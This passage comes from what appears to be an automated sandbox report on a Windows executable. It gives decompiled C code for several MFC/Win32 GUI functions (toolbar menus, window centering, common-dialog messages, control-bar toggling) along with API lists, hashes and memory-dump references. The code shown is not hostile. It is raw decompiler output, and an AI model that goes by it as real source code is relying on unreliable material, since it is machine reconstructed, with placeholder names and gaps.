								 *((intOrPtr*)( *_t314 + 4))(1);
							}
							_t264 = _t264 + 1;
							__eflags = _t264 - _t351;
						} while (__eflags < 0);
						goto L35;
					}
					_t361 =  *((intOrPtr*)(_t353 - 0x18)) - _t157;
					if( *((intOrPtr*)(_t353 - 0x18)) == _t157) {
						goto L7;
					}
					_t348 = E00418492(_t259, _t157, _t335, _t337, _t347, _t361,  *((intOrPtr*)(_t353 + 8)), _t347,  *((intOrPtr*)(_t353 + 0x10)));
					goto L6;
				}
			}



























                  0x00418492
                  0x00418492
                  0x00418492
                  0x0041849c
                  0x004184a1
                  0x004184a7
                  0x004184ac
                  0x004184b2
                  0x004184b6
                  0x004184c0
                  0x004184c5
                  0x004184cb
                  0x004184d1
                  0x004184dc
                  0x004184ec
                  0x004184f6
                  0x004189b1
                  0x004189b1
                  0x0041853b
                  0x00418541
                  0x0041854d
                  0x0041854d
                  0x004184fc
                  0x00418501
                  0x00000000
                  0x0041851b
                  0x0041851d
                  0x00418524
                  0x00418550
                  0x00418553
                  0x0041855b
                  0x00418563
                  0x0041856b
                  0x0041856f
                  0x00418574
                  0x0041857d
                  0x00418581
                  0x0041858c
                  0x0041859e
                  0x004185a2
                  0x004185ac
                  0x004185bd
                  0x004185c2
                  0x004185cc
                  0x004185de
                  0x004185e9
                  0x004185f9
                  0x004185ff
                  0x00418607
                  0x00418609
                  0x00418974
                  0x0041897a
                  0x0041897e
                  0x00418986
                  0x0041898a
                  0x00418995
                  0x0041899d
                  0x004189a0
                  0x004189a8
                  0x004189ac
                  0x00000000
                  0x004189ac
                  0x0041860f
                  0x00418611
                  0x00000000
                  0x00000000
                  0x00418623
                  0x00418625
                  0x00000000
                  0x00000000
                  0x0041862e
                  0x0041862e
                  0x00418633
                  0x0041863d
                  0x00418640
                  0x0041864e
                  0x0041865a
                  0x0041865c
                  0x0041865f
                  0x00418665
                  0x0041866a
                  0x0041866d
                  0x00418687
                  0x0041868d
                  0x0041868f
                  0x00000000
                  0x00000000
                  0x00418691
                  0x00418693
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00418693
                  0x00418697
                  0x004186a2
                  0x004186ac
                  0x004186ba
                  0x004186bd
                  0x004186c2
                  0x004186d4
                  0x004186d8
                  0x004186e7
                  0x004186f6
                  0x004186fb
                  0x004188bc
                  0x004188bc
                  0x004188bf
                  0x00000000
                  0x00000000
                  0x00418711
                  0x00418716
                  0x0041871a
                  0x0041888d
                  0x0041888f
                  0x004188b8
                  0x004188b8
                  0x004188b8
                  0x004188b9
                  0x00000000
                  0x004188b9
                  0x00418891
                  0x0041889b
                  0x004188a5
                  0x004188b2
                  0x00000000
                  0x004188b2
                  0x00418726
                  0x00418735
                  0x00418737
                  0x0041874e
                  0x00418739
                  0x00418744
                  0x00418744
                  0x00418755
                  0x0041875b
                  0x0041875d
                  0x0041876b
                  0x0041876b
                  0x0041875f
                  0x0041875f
                  0x00418763
                  0x00418763
                  0x00418772
                  0x00418777
                  0x0041877a
                  0x0041877c
                  0x00418867
                  0x00418867
                  0x00418867
                  0x00418867
                  0x00000000
                  0x00418782
                  0x0041878f
                  0x00418794
                  0x00418796
                  0x00000000
                  0x00000000
                  0x004187a7
                  0x004187bd
                  0x004187db
                  0x004187ed
                  0x004187ef
                  0x00418802
                  0x00418812
                  0x00418827
                  0x00418839
                  0x0041883b
                  0x00418850
                  0x00418852
                  0x00418859
                  0x0041885c
                  0x0041885f
                  0x0041886e
                  0x00418871
                  0x0041887a
                  0x00418880
                  0x0041888a
                  0x00000000
                  0x0041888a
                  0x0041877c
                  0x004188ce
                  0x004188dd
                  0x004188f8
                  0x00418900
                  0x00418902
                  0x00418904
                  0x00418906
                  0x00418923
                  0x00418926
                  0x0041892a
                  0x00418935
                  0x00418939
                  0x00418941
                  0x00418945
                  0x00418950
                  0x0041895b
                  0x00418963
                  0x00418967
                  0x0041896e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00418908
                  0x00418908
                  0x00418911
                  0x00418913
                  0x00418915
                  0x0041891b
                  0x0041891b
                  0x0041891e
                  0x0041891f
                  0x0041891f
                  0x00000000
                  0x00418908
                  0x00418526
                  0x00418529
                  0x00000000
                  0x00000000
                  0x00418539
                  0x00000000
                  0x00418539

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041849C
                  • lstrlenW.KERNEL32(ReBarWindow32,00000174), ref: 004184BC
                  • GetClassNameW.USER32(?,00000000,00000001), ref: 004184D1
                  • lstrlenW.KERNEL32(ToolbarWindow32), ref: 004185C8
                  • GetClassNameW.USER32(?,00000000,00000001), ref: 004185DE
                  • IntersectRect.USER32(?,?,?), ref: 00418687
                  • _memset.LIBCMT ref: 004186A2
                  • CreatePopupMenu.USER32 ref: 004186DD
                  • CopyRect.USER32(?,?), ref: 004187A7
                  • OffsetRect.USER32(?,?,?), ref: 004187BD
                  • GetSysColor.USER32(00000004), ref: 00418804
                  • InsertMenuItemW.USER32(?,?,00000001,?), ref: 004188B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$ClassMenuNamelstrlen$ColorCopyCreateH_prolog3InsertIntersectItemOffsetPopup_memset
                  • String ID: BAA$ReBarWindow32$ToolbarWindow32
                  • API String ID: 3448309770-3490429307
                  • Opcode ID: e9bead2bbd7099e9149df2a62c8ad31fcbc705176fbe87d6e0afd6b961a43ff4
                  • Instruction ID: fe1e104b2de7a07604ead795cb21c9c30ba7bb86c74c7706002967e913af63ac
                  • Opcode Fuzzy Hash: e9bead2bbd7099e9149df2a62c8ad31fcbc705176fbe87d6e0afd6b961a43ff4
                  • Instruction Fuzzy Hash: E2E18E71900218ABDF15EBA1CC85BEEB778EF44304F10816EF916A7291DF385A84CF69
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040DAD8, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0040DAD8(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E00411D59(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageW(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongW(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E0040B9B5(E0040B948(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E0040CC4F();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E0040B9B5(E0040B948(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t123 + _t116 > _v28.right) {
					_t116 = _t108 - _v60.right + _v28.right;
				}
				if(_t116 < _v28.left) {
					_t116 = _v28.left;
				}
				if(_a4 + _t129 > _v28.bottom) {
					_t129 = _v60.top - _v60.bottom + _v28.bottom;
				}
				if(_t129 < _v28.top) {
					_t129 = _v28.top;
				}
				return E00411EB6(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}
























                  0x0040dad8
                  0x0040dad8
                  0x0040dae1
                  0x0040dae4
                  0x0040daec
                  0x0040daef
                  0x0040daf4
                  0x0040db02
                  0x0040db14
                  0x0040db04
                  0x0040db07
                  0x0040db07
                  0x0040db1a
                  0x0040db1e
                  0x0040db2a
                  0x0040db32
                  0x0040db34
                  0x0040db34
                  0x0040db32
                  0x0040daf6
                  0x0040daf6
                  0x0040daf6
                  0x0040daf6
                  0x0040db36
                  0x0040db44
                  0x0040db4d
                  0x0040dbed
                  0x0040dbf4
                  0x0040dbfb
                  0x0040dc05
                  0x0040db53
                  0x0040db55
                  0x0040db5a
                  0x0040db65
                  0x0040db6e
                  0x0040db6e
                  0x0040db65
                  0x0040db70
                  0x0040db79
                  0x0040dbba
                  0x0040dbc9
                  0x0040dbd6
                  0x0040db7b
                  0x0040db7b
                  0x0040db82
                  0x0040db84
                  0x0040db84
                  0x0040db94
                  0x0040dba7
                  0x0040dbb1
                  0x0040dbb1
                  0x0040db79
                  0x0040dc14
                  0x0040dc19
                  0x0040dc1e
                  0x0040dc22
                  0x0040dc25
                  0x0040dc2c
                  0x0040dc36
                  0x0040dc3e
                  0x0040dc46
                  0x0040dc4d
                  0x0040dc52
                  0x0040dc5a
                  0x0040dc5a
                  0x0040dc60
                  0x0040dc62
                  0x0040dc62
                  0x0040dc6d
                  0x0040dc75
                  0x0040dc75
                  0x0040dc7b
                  0x0040dc7d
                  0x0040dc7d
                  0x0040dc95

                  APIs
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • GetParent.USER32(?), ref: 0040DB07
                  • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 0040DB2A
                  • GetWindowRect.USER32(?,?), ref: 0040DB44
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0040DB5A
                  • CopyRect.USER32(?,?), ref: 0040DBA7
                  • CopyRect.USER32(?,?), ref: 0040DBB1
                  • GetWindowRect.USER32(00000000,?), ref: 0040DBBA
                    • Part of subcall function 0040B9B5: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 0040B9F5
                  • CopyRect.USER32(?,?), ref: 0040DBD6
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
                  • String ID: (
                  • API String ID: 1385303425-3887548279
                  • Opcode ID: 5367c2c58e5639c408e1cff9b928656fc18d553533682ec26b57bd5362be38f5
                  • Instruction ID: f685164229309e3d6bed74e72c8bc415c91bb1796b829c76184802bda3466def
                  • Opcode Fuzzy Hash: 5367c2c58e5639c408e1cff9b928656fc18d553533682ec26b57bd5362be38f5
                  • Instruction Fuzzy Hash: B9514F72D00119ABDB10DBA8DD89EEEBBB9AF48310F154126F905F3290DB74ED45CB68
                  Uniqueness

                  Uniqueness Score: 16.53%

                  Function 004218E7, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 129registrywindowUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E004218E7(void* __ebx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				void* _t51;
				intOrPtr _t52;
				signed int _t58;
				signed int* _t66;
				void* _t67;
				signed int _t68;
				signed int _t70;

				_t51 = __ebx;
				if(_a4 != 0) {
					_push(_t67);
					_push(E0040C879);
					_t54 = 0x44fa10;
					_t68 = E0041F599(__ebx, 0x44fa10, 0, _t67, __eflags);
					__eflags = _t68;
					if(_t68 == 0) {
						E00413DD0(0x44fa10);
					}
					__eflags =  *(_t68 + 0x18);
					if(__eflags != 0) {
						__eflags = E0040E23A(_t51, _t54, 0, _t68, __eflags, _a4);
						if(__eflags == 0) {
							_t54 =  *(_t68 + 0x18);
							E0040F018( *(_t68 + 0x18), __eflags, _a4);
							 *(_t68 + 0x18) = 0;
						}
					}
					_push(_t51);
					_t52 = _a8;
					__eflags = _t52 - 0x110;
					if(_t52 != 0x110) {
						__eflags = _t52 -  *0x44fc74; // 0x0
						if(__eflags == 0) {
							L25:
							SendMessageW(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L26;
						}
						__eflags = _t52 - 0x111;
						if(_t52 != 0x111) {
							L12:
							__eflags = _t52 - 0xc000;
							if(__eflags < 0) {
								L22:
								_t31 = 0;
								goto L26;
							}
							_t70 = E0040E23A(_t52, _t54, 0x110, _t68, __eflags, _a4);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L22;
							}
							_t33 = E0041EF6A(_t70, 0x43e014);
							__eflags = _t33;
							if(_t33 == 0) {
								L16:
								__eflags = _t52 -  *0x44fc68; // 0x0
								if(__eflags != 0) {
									__eflags = _t52 -  *0x44fc6c; // 0x0
									if(__eflags != 0) {
										__eflags = _t52 -  *0x44fc64; // 0x0
										if(__eflags != 0) {
											__eflags = _t52 -  *0x44fc70; // 0x0
											if(__eflags != 0) {
												goto L22;
											}
											_t31 =  *((intOrPtr*)( *_t70 + 0x164))();
											goto L26;
										}
										_t58 = _a16 >> 0x10;
										__eflags = _t58;
										 *((intOrPtr*)( *_t70 + 0x16c))(_a12, _a16 & 0x0000ffff, _t58);
										goto L22;
									}
									_t19 = _t70 + 0x318; // 0x318
									_t66 = _t19;
									 *_t66 = _a16;
									_t31 =  *((intOrPtr*)( *_t70 + 0x168))();
									 *_t66 =  *_t66 & 0x00000000;
									goto L26;
								}
								_t31 =  *((intOrPtr*)( *_t70 + 0x164))(_a16);
								goto L26;
							}
							_t40 = E00411FAB(_t70);
							__eflags =  *(_t40 + 0x34) & 0x00080000;
							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
								goto L22;
							}
							goto L16;
						}
						_t54 = 0x40e;
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L25;
						}
						goto L12;
					} else {
						 *0x44fc64 = RegisterWindowMessageW(L"commdlg_LBSelChangedNotify");
						 *0x44fc68 = RegisterWindowMessageW(L"commdlg_ShareViolation");
						 *0x44fc6c = RegisterWindowMessageW(L"commdlg_FileNameOK");
						 *0x44fc70 = RegisterWindowMessageW(L"commdlg_ColorOK");
						 *0x44fc74 = RegisterWindowMessageW(L"commdlg_help");
						_t46 = RegisterWindowMessageW(L"commdlg_SetRGBColor");
						_push(_a16);
						 *0x44fc78 = _t46;
						_push(_a12);
						_t31 = E0041E4C6(_t52, _t54, 0x110, RegisterWindowMessageW, _a4, 0x110);
						L26:
						return _t31;
					}
				}
				return 0;
			}

















                  0x004218e7
                  0x004218f2
                  0x004218fb
                  0x004218fc
                  0x00421901
                  0x0042190b
                  0x0042190d
                  0x0042190f
                  0x00421911
                  0x00421911
                  0x00421916
                  0x00421919
                  0x00421923
                  0x00421925
                  0x0042192a
                  0x0042192d
                  0x00421932
                  0x00421932
                  0x00421925
                  0x00421935
                  0x00421936
                  0x0042193e
                  0x00421940
                  0x004219a9
                  0x004219af
                  0x00421a74
                  0x00421a7f
                  0x00421a87
                  0x00421a87
                  0x00000000
                  0x00421a87
                  0x004219b5
                  0x004219b7
                  0x004219c8
                  0x004219c8
                  0x004219ce
                  0x00421a5c
                  0x00421a5c
                  0x00000000
                  0x00421a5c
                  0x004219dc
                  0x004219de
                  0x004219e0
                  0x00000000
                  0x00000000
                  0x004219e9
                  0x004219ee
                  0x004219f0
                  0x00421a02
                  0x00421a02
                  0x00421a08
                  0x00421a19
                  0x00421a1f
                  0x00421a3b
                  0x00421a41
                  0x00421a60
                  0x00421a66
                  0x00000000
                  0x00000000
                  0x00421a6c
                  0x00000000
                  0x00421a6c
                  0x00421a48
                  0x00421a48
                  0x00421a56
                  0x00000000
                  0x00421a56
                  0x00421a24
                  0x00421a24
                  0x00421a2a
                  0x00421a30
                  0x00421a36
                  0x00000000
                  0x00421a36
                  0x00421a11
                  0x00000000
                  0x00421a11
                  0x004219f4
                  0x004219f9
                  0x00421a00
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421a00
                  0x004219b9
                  0x004219be
                  0x004219c2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421942
                  0x00421954
                  0x00421960
                  0x0042196c
                  0x00421978
                  0x00421984
                  0x00421989
                  0x0042198b
                  0x0042198e
                  0x00421993
                  0x0042199a
                  0x00421a88
                  0x00000000
                  0x00421a89
                  0x00421940
                  0x00000000

                  APIs
                  • RegisterWindowMessageW.USER32(commdlg_LBSelChangedNotify,?,0040C879), ref: 0042194D
                  • RegisterWindowMessageW.USER32(commdlg_ShareViolation,?,0040C879), ref: 00421959
                  • RegisterWindowMessageW.USER32(commdlg_FileNameOK,?,0040C879), ref: 00421965
                  • RegisterWindowMessageW.USER32(commdlg_ColorOK,?,0040C879), ref: 00421971
                  • RegisterWindowMessageW.USER32(commdlg_help,?,0040C879), ref: 0042197D
                  • RegisterWindowMessageW.USER32(commdlg_SetRGBColor,?,0040C879), ref: 00421989
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageRegisterWindow
                  • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                  • API String ID: 1814269913-3888057576
                  • Opcode ID: a910eea55f5e987258f0d622aaa107d9304e4b02b67e2f1b0480c7a1c125eddd
                  • Instruction ID: fbd35ba0a88401d27607b44adbbadbfb07741d6e7108afd9109f09a807b21828
                  • Opcode Fuzzy Hash: a910eea55f5e987258f0d622aaa107d9304e4b02b67e2f1b0480c7a1c125eddd
                  • Instruction Fuzzy Hash: FC41B474700229ABDF21DF21EC84AAF3BA0FB65350B50053BF94557271DB399891CB9D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00416EEE, Relevance: 22.7, APIs: 15, Instructions: 200windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00416EEE(intOrPtr* __ecx, struct HWND__* _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				void* __ebp;
				intOrPtr _t68;
				char _t70;
				int _t72;
				int* _t74;
				int _t77;
				intOrPtr _t85;
				struct HWND__* _t88;
				struct HWND__* _t93;
				struct HMENU__* _t95;
				struct HWND__* _t97;
				int _t104;
				intOrPtr* _t116;
				int* _t119;
				RECT* _t135;
				intOrPtr* _t138;
				signed int _t156;

				_t120 = __ecx;
				_t119 = _a8;
				_t135 = 0;
				_t138 = __ecx;
				if(_t119 != 0) {
					L2:
					_t68 =  *((intOrPtr*)( *_t138 + 0x148))();
					_v20 = _t68;
					if(_t68 == _t135) {
						goto L1;
					}
					if(_a4 != _t135) {
						_t116 = _t68 - 0xffffff80;
						if( *_t116 != _t135) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t116)) + 0x5c))(_t135);
						}
					}
					_t70 =  *((intOrPtr*)(_t138 + 0x88));
					_a8 = _t135;
					_v12 = _t70;
					if(_t70 == _t135) {
						L16:
						_t119[2] = _a8;
						if(_a4 == _t135) {
							 *(_t138 + 0xb4) = _t135;
							_t72 = GetDlgItem( *(_t138 + 0x20), 0xea21);
							_a4 = _t72;
							__eflags = _t72;
							if(_t72 != 0) {
								_t88 = GetDlgItem( *(_t138 + 0x20), 0xe900);
								__eflags = _t88;
								if(_t88 != 0) {
									SetWindowLongW(_t88, 0xfffffff4, 0xea21);
								}
								SetWindowLongW(_a4, 0xfffffff4, 0xe900);
							}
							__eflags = _t119[1];
							if(_t119[1] != 0) {
								InvalidateRect( *(_t138 + 0x20), 0, 1);
								_t85 =  *((intOrPtr*)(_t138 + 0xd4));
								__eflags = _t85 - 1;
								if(_t85 != 1) {
									__eflags = _t85 - 2;
									if(_t85 == 2) {
										 *(_t138 + 0xd8) = _t119[1];
									}
								} else {
									SetMenu( *(_t138 + 0x20), _t119[1]);
								}
							}
							_t74 = _v20 - 0xffffff80;
							__eflags =  *_t74;
							if( *_t74 != 0) {
								 *((intOrPtr*)( *( *_t74) + 0x5c))(1);
							}
							 *((intOrPtr*)( *_t138 + 0x150))(1);
							_t77 =  *_t119;
							__eflags = _t77 - 0xe900;
							if(_t77 != 0xe900) {
								_a4 = GetDlgItem( *(_t138 + 0x20), _t77);
							}
							ShowWindow(_a4, 5);
							 *(_t138 + 0x60) = _t119[5];
							return E00415740(_t138, 1);
						}
						 *(_t138 + 0xb4) = _t119[4];
						E00415740(_t138, _t135);
						_t93 = GetDlgItem( *(_t138 + 0x20),  *_t119);
						_a4 = _t93;
						ShowWindow(_t93, _t135);
						if( *((intOrPtr*)(_t138 + 0xd4)) != 1) {
							_t95 =  *(_t138 + 0xd8);
						} else {
							_t95 = GetMenu( *(_t138 + 0x20));
						}
						_t119[1] = _t95;
						if(_t95 != _t135) {
							InvalidateRect( *(_t138 + 0x20), _t135, 1);
							 *((intOrPtr*)( *_t138 + 0x70))(_t135);
							_t38 = _t138 + 0xe4;
							 *_t38 =  *(_t138 + 0xe4) & 0xfffffffe;
							_t156 =  *_t38;
						}
						_t119[5] =  *(_t138 + 0x60);
						 *(_t138 + 0x60) = _t135;
						_t97 = E00415E79(_t138, _t156, 0x7915);
						if( *_t119 != 0xe900) {
							_t97 = GetDlgItem( *(_t138 + 0x20), 0xe900);
							_a4 = _t97;
						}
						if(_a4 == 0) {
							return _t97;
						} else {
							return SetWindowLongW(_a4, 0xfffffff4, 0xea21);
						}
					} else {
						goto L7;
					}
					while(1) {
						L7:
						_t120 = _t138 + 0x84;
						_t135 =  *(E0040C339( &_v12));
						if(_t135 == 0) {
							goto L1;
						}
						_t104 = GetDlgCtrlID( *(_t135 + 0x20));
						_t12 = _t104 - 0xe800; // -59392
						_v16 = _t104;
						if(_t12 <= 0x1f) {
							_t14 = _t104 - 0xe800; // -59392
							_v8 = 1 << _t14;
							if( *((intOrPtr*)(_t135->left + 0x168))() != 0) {
								_a8 = _a8 | _v8;
							}
							if( *((intOrPtr*)(_t135->left + 0x170))() == 0 || _v16 != 0xe81f) {
								E004168E3(_t138, _t135, _t119[2] & _v8, 1);
							}
						}
						if(_v12 != 0) {
							continue;
						} else {
							_t135 = 0;
							goto L16;
						}
					}
				}
				L1:
				E00413DD0(_t120);
				goto L2;
			}
























                  0x00416eee
                  0x00416ef7
                  0x00416efc
                  0x00416efe
                  0x00416f02
                  0x00416f09
                  0x00416f0b
                  0x00416f11
                  0x00416f16
                  0x00000000
                  0x00000000
                  0x00416f1b
                  0x00416f1d
                  0x00416f22
                  0x00416f2b
                  0x00416f2b
                  0x00416f22
                  0x00416f2e
                  0x00416f34
                  0x00416f37
                  0x00416f3c
                  0x00416fbc
                  0x00416fbf
                  0x00416fc5
                  0x00417080
                  0x00417086
                  0x0041708c
                  0x00417094
                  0x00417096
                  0x0041709c
                  0x004170a2
                  0x004170a4
                  0x004170ae
                  0x004170ae
                  0x004170ba
                  0x004170ba
                  0x004170c0
                  0x004170c4
                  0x004170cd
                  0x004170d3
                  0x004170d9
                  0x004170dc
                  0x004170ec
                  0x004170ef
                  0x004170f4
                  0x004170f4
                  0x004170de
                  0x004170e4
                  0x004170e4
                  0x004170dc
                  0x004170fd
                  0x00417100
                  0x00417103
                  0x0041710d
                  0x0041710d
                  0x00417116
                  0x0041711c
                  0x0041711e
                  0x00417120
                  0x0041712c
                  0x0041712c
                  0x00417134
                  0x00417141
                  0x00000000
                  0x00417144
                  0x00416fd1
                  0x00416fd7
                  0x00416fe1
                  0x00416fe9
                  0x00416fec
                  0x00416ff9
                  0x00417006
                  0x00416ffb
                  0x00416ffe
                  0x00416ffe
                  0x0041700c
                  0x00417011
                  0x00417019
                  0x00417024
                  0x00417027
                  0x00417027
                  0x00417027
                  0x00417027
                  0x00417031
                  0x0041703b
                  0x0041703e
                  0x0041704a
                  0x00417050
                  0x00417056
                  0x00417056
                  0x0041705d
                  0x0041714d
                  0x00417063
                  0x00000000
                  0x0041706d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00416f3e
                  0x00416f3e
                  0x00416f42
                  0x00416f4d
                  0x00416f51
                  0x00000000
                  0x00000000
                  0x00416f56
                  0x00416f5c
                  0x00416f62
                  0x00416f68
                  0x00416f6a
                  0x00416f77
                  0x00416f84
                  0x00416f89
                  0x00416f89
                  0x00416f98
                  0x00416faf
                  0x00416faf
                  0x00416f98
                  0x00416fb8
                  0x00000000
                  0x00416fba
                  0x00416fba
                  0x00000000
                  0x00416fba
                  0x00416fb8
                  0x00416f3e
                  0x00416f04
                  0x00416f04
                  0x00000000

                  APIs
                  • GetDlgCtrlID.USER32(?), ref: 00416F56
                  • GetDlgItem.USER32(?,?), ref: 00416FE1
                  • ShowWindow.USER32(00000000,00000000), ref: 00416FEC
                  • GetMenu.USER32(?), ref: 00416FFE
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00417019
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                    • Part of subcall function 00415E79: LoadAcceleratorsW.USER32(?,?), ref: 00415E8D
                  • GetDlgItem.USER32(?,0000E900), ref: 00417050
                  • SetWindowLongW.USER32(00000000,000000F4,0000EA21), ref: 0041706D
                  • GetDlgItem.USER32(0000EA21,0000EA21), ref: 00417086
                  • GetDlgItem.USER32(0000E900,0000E900), ref: 0041709C
                  • SetWindowLongW.USER32(00000000,000000F4,0000EA21), ref: 004170AE
                  • SetWindowLongW.USER32(?,000000F4,0000E900), ref: 004170BA
                  • InvalidateRect.USER32(00000001,00000000,00000001), ref: 004170CD
                  • SetMenu.USER32(00000000,00000000), ref: 004170E4
                  • GetDlgItem.USER32(00000000,00000000), ref: 00417126
                  • ShowWindow.USER32(?,00000005), ref: 00417134
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ItemWindow$Long$InvalidateMenuRectShow$AcceleratorsCtrlException@8LoadThrow
                  • String ID:
                  • API String ID: 1210699209-0
                  • Opcode ID: 8a194de7c4c016920278b8844ccd7351c3199abfb985d7114d7ff90eb678e5c3
                  • Instruction ID: a949d6e83fd856d0034ff5a3a90e0e52e4b6eb01945590dd1165a8c6749a0204
                  • Opcode Fuzzy Hash: 8a194de7c4c016920278b8844ccd7351c3199abfb985d7114d7ff90eb678e5c3
                  • Instruction Fuzzy Hash: 74817E30600700EFCB219F68CC88A9ABBF5FF88710F14896AF556DB2A0D775D991CB54
                  Uniqueness

                  Uniqueness Score: 0.73%

                  Function 0041BD5E, Relevance: 21.4, APIs: 14, Instructions: 421COMMON
                  Download Yara Rule
